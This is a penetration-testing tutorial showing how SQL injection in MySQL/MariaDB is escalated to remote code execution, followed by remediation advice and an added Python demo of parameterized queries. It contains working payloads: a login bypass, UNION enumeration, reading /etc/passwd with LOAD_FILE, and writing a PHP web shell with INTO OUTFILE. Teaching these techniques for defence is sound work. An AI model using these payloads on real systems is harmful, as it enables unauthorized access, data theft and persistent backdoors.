June 30, 2026
From SQL Injection to Remote Code Execution (RCE): A Practical Walkthrough
By Giorgi Bedoshvili
During web application penetration testing, finding a SQL Injection (SQLi) flaw is often just the beginning. While many security practitioners focus strictly on data exfiltration or authentication bypass, the ultimate goal during an infrastructure audit is to turn this database vulnerability into a full operating system compromise.
In this guide, we will break down the methodology of identifying a SQL Injection entry point, verifying file system privileges, and leveraging the database engine to write a PHP Web Shell to the server, achieving full Remote Code Execution (RCE).
1. Authentication Bypass: Forcing Logins
The root cause of SQLi is unsafe string concatenation: user-supplied input is spliced directly into the query text and executed as part of it. In a vulnerable login form, an attacker can exploit this to bypass authentication entirely.
By injecting the following string into the username field:
SQL
' OR 1=1 -- -
The -- - comment syntax tells the underlying database engine to ignore the remainder of the original query (the password verification). The WHERE clause evaluates to true, granting instant administrative access without requiring valid credentials.
2. Structural Mapping via UNION Attacks
To successfully inject a file or manipulate output, we must match the exact column layout of the original query. A UNION statement whose column count does not match the original SELECT is rejected by the database with an error.
Column Enumeration:
We abuse the ORDER BY clause to determine the number of columns:
SQL
' ORDER BY 1-- -
' ORDER BY 5-- -
If ORDER BY 4 displays normally but ORDER BY 5 returns a system error, the query returns exactly 4 columns.
Next, we map the injection hooks to identify which columns reflect output directly to the web interface:
SQL
' UNION SELECT 1, 2, 3, 4-- -
Take note of which indices appear on the screen: these are the columns whose output reaches the page.
3. Escalating to Code Execution (RCE) via INTO OUTFILE
In database environments like MySQL or MariaDB, if the database user holds the FILE privilege and the secure_file_priv system variable is empty (so it does not restrict file paths), the database can be made to read and write files directly on the host operating system.
Arbitrary File Reading
To view internal target configurations, we call the LOAD_FILE() function within our mapped column window:
SQL
' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -
Writing a Persistent Web Shell
If the web server document root is writable by the database process (e.g., the default Apache path /var/www/html/), a single line of PHP can be written to disk as a web shell.
SQL
' UNION SELECT "", '<?php system($_REQUEST[0]); ?>', "", "" INTO OUTFILE '/var/www/html/shell.php'-- -
Verification and Shell Testing
Once written, the payload acts as a persistent backdoor. We can interact with it directly from the browser URL bar, passing the command in the request parameter named 0:
HTTP
http://<TARGET_IP>/shell.php?0=id
If the browser prints www-data or another local user account context, a simple query bypass has been escalated into interactive Remote Code Execution.
4. Remediation and Defense Engineering
Defending web backends against injection attacks requires a defense-in-depth architectural model:
- Prepared Statements (Parameterized Queries): Data must never mix with executable logic. Utilizing strict parameter placeholders compiles the SQL query structure first, stripping user inputs of any operational capability.
- Input Regex White-listing: Restrict data entry endpoints to strictly defined patterns (e.g., allowing only numeric strings for identifier forms).
- Isolation of Privileges: Never connect a live production application to the database as root or another administrative account. Ensure application users lack the FILE privilege, so they cannot read or write files on the operating system.
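The first two defenses side by side, as an added example that is not part of the original post: the concatenated login query falls to the same ' OR 1=1 -- - payload used above, while the parameterized version treats the payload as an ordinary (non-matching) username. The users table, the credentials and the helper names are constructed for the demo; SQLite stands in for MySQL because the comment and quoting behaviour that matters here is the same.

```python
import re
import sqlite3

PAYLOAD = "' OR 1=1 -- -"   # the authentication-bypass string from section 1


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; real systems store hashes.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')")
    return conn


def login_concatenated(conn, username: str, password: str):
    """Vulnerable: input is spliced into the SQL text, so the payload's quote
    closes the literal and -- - comments out the password check."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str):
    """Hardened: the query structure is fixed before any input is seen; the
    driver binds the values, so quotes and comment markers are just characters."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def is_numeric_identifier(value: str) -> bool:
    """Allow-list check for identifier fields: digits only, anything else is rejected."""
    return re.fullmatch(r"[0-9]+", value) is not None


def demo() -> dict:
    conn = build_db()
    return {
        "valid_concat": login_concatenated(conn, "admin", "correct-horse"),
        "bypass_concat": login_concatenated(conn, PAYLOAD, "wrong"),   # 'admin': bypassed
        "valid_param": login_parameterized(conn, "admin", "correct-horse"),
        "bypass_param": login_parameterized(conn, PAYLOAD, "wrong"),   # None: rejected
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```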
If you find this real-world technical methodology valuable, consider following my profile for more upcoming Active Directory and infrastructure audit breakdowns.